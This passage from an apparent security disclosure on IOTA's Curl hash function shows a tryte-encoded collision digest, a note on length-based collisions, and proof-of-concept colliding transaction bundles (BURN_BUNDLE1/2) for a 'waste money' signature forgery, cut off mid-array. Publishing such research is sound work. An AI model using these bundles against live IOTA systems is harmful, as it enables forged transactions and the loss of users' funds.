$ ./ccurl-digest RETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRXHF9QJQHUTILIPIXUYRVSJEIPJDRIUVWMUABSIKIBAKENE9KVFJUEQUHFRVGELFGJIDXQARWH99XTORHXRETHT9ES9HRCUITBHVCUHOBPUUUHT9PHLUNWRWGKBKF9YUMDWRXTRVGZHFZEHGATZXZAUPGVEKNMQXFVRPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTHINGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTHINGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9GOINGFORTHEBACKOFBEYOND9NOTH
INGGONNASTOPYOUTHERESNOTHINGTHATSTRONG9SOCLOSENOWYOURENEARLYATTHEBRINK9SOPUSHITOOHYEAH99WELCOMETOTHELIMITLIMIT9TAKEITBABYONESTEPMORE9THEPOWERGAMESSTILLPLAYINGSO9YOUBETTERWINIT99PUSHITTOTHELIMITLIMIT9NOONELEFTTOSTANDINYOURWAY9YOUMIGHTGETCARELESSBUTYOULLNEVERBESAFE9WHILEYOURESTILLINIT99WELCOMETOTHELIMITLIMIT9STANDINGONTHERAZORSEDGE9DONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99WELCOMETOTHELIMIT9PUSHITTOTHELIMITPUSHITTOTHELIMIT9WALKALONGTHERAZORSEDGE9BUTDONTLOOKDOWNJUSTKEEPYOURHEAD9ORYOULLBEFINISHED99OPENUPTHELIMIT9PASTTHEPOINTOFNORETURN9YOUVEREACHEDTHETOPBUTSTILLYOUGOTTALEARN9HOWTOKEEPIT99HITTHEWHEELANDDOUBLETHESTAKES9THROTTLEWIDEOPENLIKEABATOUTOFHELL9YOUCRASHTHEGATESCRASHTHEGATES9

BUWSNIAGAYCVUPGUJMWIIYHR9DQAPVHRKHXPJKB9BTCKPUXTFSNPXIBHCIIYCJRAQJOGHXEYLXSJURUFS

Other Collisions: We also note that there are several trivial methods to generate collisions for different message lengths in Curl, but these do not appear to impact the security of IOTA. These can also be found in our Python example code. The developers of IOTA maintain that executing Curl on messages of different lengths is an unsupported use of the Curl hash function.

7. Proof-of-Concept - IOTA Signature Forgery Examples

We provide two examples of a signature forgery attack we executed using valid IOTA bundles. We provide instructions to replicate our signature forgery attacks here. The colliding bundles are given below.

Waste Money Attack

These two bundles demonstrate the signature forgery "waste money" attack described earlier in the report. A signature on BURN_BUNDLE1 is also a valid signature for BURN_BUNDLE2.

var BURN_BUNDLE1 []string = []string{
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999ROQDJLWUDUXBKHJ9PNUPEBYLSJTSAT9RCKFVTCJFDUKHZJUDSSTELTIRA9DHKPUZTGSHAZNJKOFFKAXXPWPOC99999999999999999999999IOTFORALL999999999999999999QONOPXD99999999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBJKUMDNFCXZYGXRPEOEASTXNGCZHHBAWRMJFURVDDGEEVAXNOIYSSI99ZJPMDUPWBFESIOQQZLOTB99999999999999999999999999999999999999999999999999999999999999999999999999999999999999TPMXBQHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIXZJXMKVJEFVEIOWSSQJFVVRMBKE",
	"T9ENXSCXESWBKWAEZYAXTH9F9MXIIQQFAOOBKWFPNIPNNLPGGQTEITPVPHD9NYROGXCXZFSDVGNNAVHXYDJWLDNHRCOPUVIQJKAUUOQGKXETJKAQYMEAVBCDMCLEWZBBBOQHHEUFTOTLGCYLGSYR9NGZJERVVBPLKTAKDKZIZYGTLLAURPPZ9RBDTNITEHJESGCCILZGLZGHELDGQUYGLAXSMHAXKXKVZMEPXJXEU9EEQE9NOESANDTPG9VXDGAMDCSQXIZ9TMYHJINFZJMFHNBYVKUFYUVOMVWIVDOR9GQKIDDXMVTTYFSQSBTBCURPHSTQEKIDZKAWOAIXIOSRJUAWF9FYGSECKATVXMTFMTZTHIWZGGHHRZH9TCWBJICIFXPUGRPVQVWLQBYWBSOLPFLPADJFEWKCEZUCKELTBQHAZPKK9JOZNZTYTUSGCXELQBMKOYPHWPAXQO9RJOFZBSUNNINQGPQWPQIF9DSFDABVHV99NBEJHXGOBGZJDYQNGDWSSSPBXRLCDWIEWRWUIBDGBP9VKDXUQPOHWHBDXZEE9XCHQKKAVEOPFT9OQCP9FWXMBZZKHA9WAZTQPTGDEDZSUQYBBQFMUXYK9XHGOT9PIF99MABTFNOKBQNLBZX9KLWIQWXJNNEME9OLEBIACIPEDNNRNOQOVCJV9LTVZBJ9BFQRTEYPNCHSFRUGINUTFMQAN9AYRXURAYYFEJSAD9MSFWFHZEARJVFWXKQBBNF9XDIUZNYTZCIQXWFHUNMVZHCLZDMDASETYGMVP9AAUJUPWV9OZYNBAZNNLK9XPZWWWEYMHSV9TIAWEQFFEFIGDKRITLQFNTUF9UTBQXQKFUJXOHUCDSWBYMPOOLJBHUSQFSNPYHPGDPQOSLWJWYQXZCLNIRGKVNXUTBKUIHSKHJIIC9GWYTUOFVTEN9GUCWBEMYLZYUPJGGD9FZ9SHEGELULYIJRX9PMDEYAVLBTFZARAUNCBNDKUKQGONPWIQRDWH9LNADANVLZ9CXCLCSDQQFGVKMUWJIRDYJBKDWPUSBQWBKBPIBGFFXTPCQCDCAAMOEUMXGZKVXUTXWAHBXFED9NDOGIDVEWRSFQMRYLQPSYIEGOPC9OUYBXNMPRLSUACDYUPUXKFBIFZIGLRUGRJVXASHIMRQMDWYDRSXWMUXWBAAFNEIJPZYFEWQQCDSYQVALWNMMQFXELHRHPJVOTYNHGHGHXGZEDKPBFCKXAUBTXHYYCHCZDYQFQDLEILCCOFOIRREXZQJMOKBBHSV9W9ROBCHMLQUFEJLZVS99IJQWXQKDI9JMXIRSM9GJCDHCFQXPYPYTCMFBF9DBTHTDSDWHIIWKUKGNTTJHHLOCWNKVKKJA9UMDAYFINZJXHUPLHZSFXYWCBUBXMGRXZYZDVZQWDNVTOPIJ9OCNYPUYOSYRQ9CJTBVLUFNNNHBLD9UWMQ9AZEXKRTAIBLEIMUSSFY9NWSTQTCGZCLPPHBUWXLQZZINXGKGMGBVUCGRKGHVHTBZQEUXXP9TZTVGVOBAWGHXZBEJXUM9SDF9AUDRDTVM9OLUUKBKRILDDXS9IACTQDCVGCOEELTYAVTQWZOSZXDRGSLIANMTAZMBNWGFWTADZIRWPORWMXNVMAZFWOXXTN9QHYZVRWLNUQFLXVAXCLVGUQEZOXX9GNGDGQYRHWHVFZBHGTCMZNDEIUUW9WCLCBXJRRWWAGYYL9MFRYMGEYFVZBGXLZWQVPLAORHRHKBZRK9RFPVYCFY9OGZTUIMRCFUKECNVAUDEVMPFALFLOCJAFPP9ZJQSWKPDEUKYLQEHRKBZFAZNT9KAHCBTMXRUVTIZQF9TCPXTVHWOFGFDSHWHMOQPJIMQRHZIRUCBCGKBOCLCFNFOIZDMOMVHTNIOPWWBVVXXEREZYQDQOLNCZTHIHXYJYXNLOJFRCESLW9GFPWVGIVFIRZXPWKWBJRLMDKANZNHXZERMRR9GYSPXRHGYFTGSA9PTIYIIE
SAVYBKSDBLENGJVJMBTBVLGYLOLUBEJAOJTZJBVEEX9RVCWYQL99TAJNQ9WJOGGGXQRWLQQUACRSBPTURELEFLFVSJEEGCFRKECKYGIKAUJI9XQDFVZXPPQCQGTJWBVIH9GNZWZZEMSMWLP99XPPKTAMEJTXUDFSJIYRGRSZJFBGEHPEREIVAKWEGLJNIUBUWDAFWZFWVDIQBTBALLKSQPEFPWGWZKYDO9QWB9FHQMOAONYMQU9AQOOJHDJCWGXBIOJGFQKGSSOFQNZLBSOPY99999999999999999999IOTFORALL999999999999999999QONOPXD99A99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBEDGIMHMPIBKDRBMVHLGWVIKHXRYAMRHDMXMCKKECVTILEKQPLU9REKU9EPFBBUJFLKKSXZRHYBYE99999999999999999999999999999999999999999999999999999999999999999999999999999999999999LSOHCSYKWXYECPTHKLODD9SMCWWHFSYPP9SISSTYAHCSWTTHGIU9ZDQURAGHZSMOCD9UFXLONCPPEPROK",
	"AZZOAMZUHGXDUOIHRAUMIHKXGGHHEQQMIWC9YJEOBBSGHSPAEOMETB9KJYWY9JAAIBATGBLJKSGOJRESIBAMUXJZQPBYUPLIXRVJKEXWLZCTKLFAHDTIGCZLAKNPDDBPNTBLOZWUUORDJRHQRG9JUDXM9TFJPBTGZU9SLYDSVXUJFOVXATDNAVKMYMKISIBFZUGXURFMUXAMSRSSIPJJMNWFNIIYXDTTGRSJAG9GVNNISICGT9NNOBNL9KVUAH9XSFIRQCE9CZZKWYUYXBFP9ALYIBGYIIAZLJGWOTPXQYDWYNZVHBHDMMIQSSIQBQLMGSQZZCOVTZJRAPHNZEQEIOQRDXBUCTTSNITUUJBINBKN9WELKCICGRPZQVGWXPQDPBSIOTOCQEHPUKVQFEYFBZETIDDQPZU9BICHVWAKVWZLURDLMMHRNGFGHLTBGSWSMBFLSAUMKFRHIBEKMBHYXJGILSANILBADYTRFFA9YEKXLHPYF99OAATJLSDRPIBWKIEHAWEZRWGSZTIQVFWSDZFCNGYBKOOIQSX9MWLKXYV9OJALEXRCRACJGELZGMHABAARWWUZTXANVJWSIEVDYTDUODPWFSZRSTIGKQKFSKLRGOY9MVDLRJCEIBLTVQCKSAEWNJIIQHTXKERPYY9KYQW9MUHJLXEKAEH9WHJCBKMMCPCTDCSHGCBLFCFVHETFPASMMWLFTOAWRXQUTEEXQRWPQDPQLCQVADCOH9NHZFQVZBHFXTTXFOLTUUGGYDPFQNUULSHIGEBKQMDBOCSNQGRSWMGSUVOOLWGLYAWYENOGLYJJVMNHG9VLCPLAVEYIYU9JQAUTI9KCYBFGEMMLQRFQYNQHYGZINBNTDQVACCOCJIOYDDB9ZKUJHZFHCSTYICHRPWMYYRUODWLNGQSFOWLTEJ9HGWHDJEDAPAQPJCKZ9QEVVUNRRPVCZGZPDOFYZFYUZFGUZQJCNBHALHIABDCT9GWOAIVDS9KKXPEQSTV9TWCTOEUFJIWGG9BGPSWZ9GMWWTAIVOPXCAIHCCYPZVAWTRPYA9M9NMPMDZHHFJXORIHIRKVVDSE9SKOLGPUGCIVAYEYERGILSGLWVLSKCRJWLRLCNZZBZ9N9ECFIDCTOLDAVJF9LUQKCTKUXLM9VUMVRBPPRJWXPDNGTBW9VLMIQVNCVSHLFTD9CLTCYBXNYTXMJEAA9YRVBTMDVKFSNKIGRAEDNCXTHGNVCVRSJTZTFAWJLSXFFOKHGYIRFRBHJOBN9SBPXLDCBMBXVYMLMV9QILNSG9OQWZWUUBDQQVFUCMFGNJLCZELGVXTKVYSFEZZHJGZJLNPHYXHKBW9P9LVFUDRHFPVOI9LWCZPYXMSCDSWNHHNYYSLWTYMWVZJXTZERJIITODWAZSJP9LENIJNPNDND9JDWTWK9SNYIQITBMHBXZHIAFNES9FTPQWVZKLMDVJKHAGUR9MTDOYRZRVQBOT9CRBWOKZBUEFLDZLLCXWKTRONBLTJ9GRMQTOCTTSKWAYGBTNDFG9BWIQGTPOXBZPPEPSZD9REOGLAREBTQJGJDBXZBIIZOFFDNBRNQFZNFSDH9NTKTKTXOPRZZGYWPVEFQHIZSBGDLICHPAPSLXNCQMMMN9JOAPKGMJDFAHAALWZRHRZCDNUMMYHWFWWVRRLWGJ9M9HRZFKGNUDOCINHUOGBKDUFBGNMXIYYULCCQWGCETCNVTPKBUIMAJBOUCAUVFVKO9PTKB9XORQXHPCVGVHNBZCABJNGNDRZALIXWBHRAWLYOVPNEOGTCSXCFTQCFBIQOUCTRCKSHPJYGXVOGKZFUID9UTNTHHHPUZOUGBTRDIJDJYAFLSGZNQQ9MKDBXSTELCSEPOME9SXYPTOATRDCKTEWJXNYWEPRGUCSXMILODMO9LBZEPC9QLDYYTSSKCVNAHQBPJCMLOZVTRCFEGCU9ZHK9VKLJLVOJCTMDBEAVGCOCYMBFJJSADVSLBNYTPNWDY9CE
DTKLTLI9DVYXJKKCF9NS9AUCNKNCBTJLWJQXKSCGRTMCRVKPQXJMLCPTLUBNM9JPKYQXPFLDFTZBCJUAWOBWDS9WJVWOYHHFHUPMUJBZQDUWDDODRCEAPHYTAJXERJHA9VNLWMOAOBPWVVBOSIXBWJWTNQXBMBPHYY9LODFTETJUSVNVUTLYIXXAA9VPGUBUWDAFWZFWVDIQBTBALLKSQPEFPWGWZKYDO9QWB9FHQMOAONYMQU9AQOOJHDJCWGXBIOJGFQKGSSOFQN999999999999999999999999999OIWIKARHXINUDPCAKJPWE9KLQQWQONOPXD99B99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBRWNYGRUPLIIFDKKOS9ZLNRUHFXTKNEMHNBCJTZTIXYEMFGKDGLU9BDFXKMPPWIZCHXWYRXPGLDJZ99999999999999999999999999999999999999999999999999999999999999999999999999999999999999RRCMVPHUBRSRAS9DHXTJ9UEMJOWHLPCECP9FQQOFLOWYOMSMFAWELLTU9FZ9LVHALTB9H9SNXUTFYMTCO",
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999FHCLCTGISPCIDWQYNQYKZZZRR9CXJPFNIPCITNCVVYINBXEYFEYKXGETCZMIQJBMBZBOMSDVFPAXR9OBNEZJELKB99999999999999999999IOTFORALL999999999999999999VRNOPXD99C99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLB999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999PRWBZGIJFWAPFKZBNHSNCRXOVCSUDEUCVNXSELYDGJWUFAEZCCAIQPFJMQOWSKM9YLGPLOVSFY9FMOCQR",
}

var BURN_BUNDLE2 []string = []string{
	"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999ROQDJLWUDUXBKHJ9PNUPEBYLSJTSAT9RCKFVTCJFDUKHZJUDSSTELTIRA9DHKPUZTGSHAZNJKOFFKAXXPWPOC99999999999999999999999IOTFORALL999999999999999999QONOPXD99999999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBUVFIJRFOGR9MUWPBJCGSUYIOL9KFXMYXGSJQ9AXQTCWESFGDVRBDREIUHURCIJUBKIBPACTNTQPJ99999999999999999999999999999999999999999999999999999999999999999999999999999999999999AKKSAQHLAIHHRVEBB9DWBFYQSTTTDYUAPXXFRNEFWYCKHWJRIVH9VIF9JXMKVJEFVEIOWSSQJFVVRMBKE",
	"T9ENXSCXESWBKWAEZYAXTH9F9MXIIQQFAOOBKWFPNIPNNLPGGQTEITPVPHD9NYROGXCXZFSDVGNNAVHXYDJWLDNHRCOPUVIQJKAUUOQGKXETJKAQYMEAVBCDMCLEWZBBBOQHHEUFTOTLGCYLGSYR9NGZJERVVBPLKTAKDKZIZYGTLLAURPPZ9RBDTNITEHJESGCCILZGLZGHELDGQUYGLAXSMHAXKXKVZMEPXJXEU9EEQE9NOESANDTPG9VXDGAMDCSQXIZ9TMYHJINFZJMFHNBYVKUFYUVOMVWIVDOR9GQKIDDXMVTTYFSQSBTBCURPHSTQEKIDZKAWOAIXIOSRJUAWF9FYGSECKATVXMTFMTZTHIWZGGHHRZH9TCWBJICIFXPUGRPVQVWLQBYWBSOLPFLPADJFEWKCEZUCKELTBQHAZPKK9JOZNZTYTUSGCXELQBMKOYPHWPAXQO9RJOFZBSUNNINQGPQWPQIF9DSFDABVHV99NBEJHXGOBGZJDYQNGDWSSSPBXRLCDWIEWRWUIBDGBP9VKDXUQPOHWHBDXZEE9XCHQKKAVEOPFT9OQCP9FWXMBZZKHA9WAZTQPTGDEDZSUQYBBQFMUXYK9XHGOT9PIF99MABTFNOKBQNLBZX9KLWIQWXJNNEME9OLEBIACIPEDNNRNOQOVCJV9LTVZBJ9BFQRTEYPNCHSFRUGINUTFMQAN9AYRXURAYYFEJSAD9MSFWFHZEARJVFWXKQBBNF9XDIUZNYTZCIQXWFHUNMVZHCLZDMDASETYGMVP9AAUJUPWV9OZYNBAZNNLK9XPZWWWEYMHSV9TIAWEQFFEFIGDKRITLQFNTUF9UTBQXQKFUJXOHUCDSWBYMPOOLJBHUSQFSNPYHPGDPQOSLWJWYQXZCLNIRGKVNXUTBKUIHSKHJIIC9GWYTUOFVTEN9GUCWBEMYLZYUPJGGD9FZ9SHEGELULYIJRX9PMDEYAVLBTFZARAUNCBNDKUKQGONPWIQRDWH9LNADANVLZ9CXCLCSDQQFGVKMUWJIRDYJBKDWPUSBQWBKBPIBGFFXTPCQCDCAAMOEUMXGZKVXUTXWAHBXFED9NDOGIDVEWRSFQMRYLQPSYIEGOPC9OUYBXNMPRLSUACDYUPUXKFBIFZIGLRUGRJVXASHIMRQMDWYDRSXWMUXWBAAFNEIJPZYFEWQQCDSYQVALWNMMQFXELHRHPJVOTYNHGHGHXGZEDKPBFCKXAUBTXHYYCHCZDYQFQDLEILCCOFOIRREXZQJMOKBBHSV9W9ROBCHMLQUFEJLZVS99IJQWXQKDI9JMXIRSM9GJCDHCFQXPYPYTCMFBF9DBTHTDSDWHIIWKUKGNTTJHHLOCWNKVKKJA9UMDAYFINZJXHUPLHZSFXYWCBUBXMGRXZYZDVZQWDNVTOPIJ9OCNYPUYOSYRQ9CJTBVLUFNNNHBLD9UWMQ9AZEXKRTAIBLEIMUSSFY9NWSTQTCGZCLPPHBUWXLQZZINXGKGMGBVUCGRKGHVHTBZQEUXXP9TZTVGVOBAWGHXZBEJXUM9SDF9AUDRDTVM9OLUUKBKRILDDXS9IACTQDCVGCOEELTYAVTQWZOSZXDRGSLIANMTAZMBNWGFWTADZIRWPORWMXNVMAZFWOXXTN9QHYZVRWLNUQFLXVAXCLVGUQEZOXX9GNGDGQYRHWHVFZBHGTCMZNDEIUUW9WCLCBXJRRWWAGYYL9MFRYMGEYFVZBGXLZWQVPLAORHRHKBZRK9RFPVYCFY9OGZTUIMRCFUKECNVAUDEVMPFALFLOCJAFPP9ZJQSWKPDEUKYLQEHRKBZFAZNT9KAHCBTMXRUVTIZQF9TCPXTVHWOFGFDSHWHMOQPJIMQRHZIRUCBCGKBOCLCFNFOIZDMOMVHTNIOPWWBVVXXEREZYQDQOLNCZTHIHXYJYXNLOJFRCESLW9GFPWVGIVFIRZXPWKWBJRLMDKANZNHXZERMRR9GYSPXRHGYFTGSA9PTIYIIE
SAVYBKSDBLENGJVJMBTBVLGYLOLUBEJAOJTZJBVEEX9RVCWYQL99TAJNQ9WJOGGGXQRWLQQUACRSBPTURELEFLFVSJEEGCFRKECKYGIKAUJI9XQDFVZXPPQCQGTJWBVIH9GNZWZZEMSMWLP99XPPKTAMEJTXUDFSJIYRGRSZJFBGEHPEREIVAKWEGLJNIUBUWDAFWZFWVDIQBTBALLKSQPEFPWGWZKYDO9QWB9FHQMOAONYMQU9AQOOJHDJCWGXBIOJGFQKGSSOFQNZLBSOPY99999999999999999999IOTFORALL999999999999999999QONOPXD99A99999999C99999999UXOTHHZPYHAKLQNOYGHUFDNIQORRPQVRXQPVCZEWEMPHVIJB9OJIDB99ZJAZLFMXNOKBRSDG9HXSOLGLBDQKUXWGQDQXSROL9XNNYMMESP9YCXDQAXRBG9DXGVSBHLNXGQKBVFFUCEUHMKCTJQPMLJZDLVRBO99999999999999999999999999999999999999999999999999999999999999999999999999999999999999NINQDSYKWXYECPTHKLODD9SMCWWHFSYPP9SISSTYAHCSWTTHGIU9ZDGWRAGHZSMOCD9UFXLONCPPEPROK",
	"AZZOAMZUHGXDUOIHRAUMIHKXGGHHEQQMIWC9YJEOBBSGHSPAEOMETB9KJYWY9JAAIBATGBLJKSGOJRESIBAMUXJZQPBYUPLIXRVJKEXWLZCTKLFAHDTIGCZLAKNPDDBPNTBLOZWUUORDJRHQRG9JUDXM9TFJPBTGZU9SLYDSVXUJFOVXATDNAVKMYMKISIBFZUGXURFMUXAMSRSSIPJJMNWFNIIYXDTTGRSJAG9GVNNISICGT9NNOBNL9KVUAH9XSFIRQCE9CZZKWYUYXBFP9ALYIBGYIIAZLJGWOTPXQYDWYNZVHBHDMMIQSSIQBQLMGSQZZCOVTZJRAPHNZEQEIOQRDXBUCTTSNITUUJBINBKN9WELKCICGRPZQVGWXPQDPBSIOTOCQEHPUKVQFEYFBZETIDDQPZU9BICHVWAKVWZLURDLMMHRNGFGHLTBGSWSMBFLSAUMKFRHIBEKMBHYXJGILSANILBADYTRFFA9YEKXLHPYF99OAATJLSDRPIBWKIEHAWEZRWGSZTIQVFWSDZFCNGYBKOOIQSX9MWLKXYV9OJALEXRCRACJGELZGMHABAARWWUZTXANVJWSIEVDYTDUODPWFSZRSTIGKQKFSKLRGOY9MVDLRJCEIBLTVQCKSAEWNJIIQHTXKERPYY9KYQW9MUHJLXEKAEH9WHJCBKMMCPCTDCSHGCBLFCFVHETFPASMMWLFTOAWRXQUTEEXQRWPQDPQLCQVADCOH9NHZFQVZBHFXTTXFOLTUUGGYDPFQNUULSHIGEBKQMDBOCSNQGRSWMGSUVOOLWGLYAWYENOGLYJJVMNHG9VLCPLAVEYIYU9JQAUTI9KCYBFGEMMLQRFQYNQHYGZINBNTDQVACCOCJIOYDDB9ZKUJHZFHCSTYICHRPWMYYRUODWLNGQSFOWLTEJ9HGWHDJEDAPAQPJCKZ9QEVVUNRRPVCZGZPDOFYZFYUZFGUZQJCNBHALHIABDCT9GWOAIVDS9KKXPEQSTV9TWCTOEUFJIWGG9BGPSWZ9GMWWTAIVOPXCAIHCCYPZVAWTRPYA9M9NMPMDZHHFJXORIHIRKVVDSE9SKOLGPUGCIVAYEYERGILSGLWVLSKCRJWLRLCNZZBZ9N9ECFIDCTOLDAVJF9LUQKCTKUXLM9VUMVRBPPRJWXPDNGTBW9VLMIQVNCVSHLFTD9CLTCYBXNYTXMJEAA9YRVBTMDVKFSNKIGRAEDNCXTHGNVCVRSJTZTFAWJLSXFFOKHGYIRFRBHJOBN9SBPXLDCBMBXVYMLMV9QILNSG9OQWZWUUBDQQVFUCMFGNJLCZELGVXTKVYSFEZZHJGZJLNPHYXHKBW9P9LVFUDRHFPVOI9LWCZPYXMSCDSWNHHNYYSLWTYMWVZJXTZERJIITODWAZSJP9LENIJNPNDND9JDWTWK9SNYIQITBMHBXZHIAFNES9FTPQWVZKLMDVJKHAGUR9MTDOYRZRVQBOT9CRBWOKZBUEFLDZLLCXWKTRONBLTJ9GRMQTOCTTSKWAYGBTNDFG9BWIQGTPOXBZPPEPSZD9REOGLAREBTQJGJD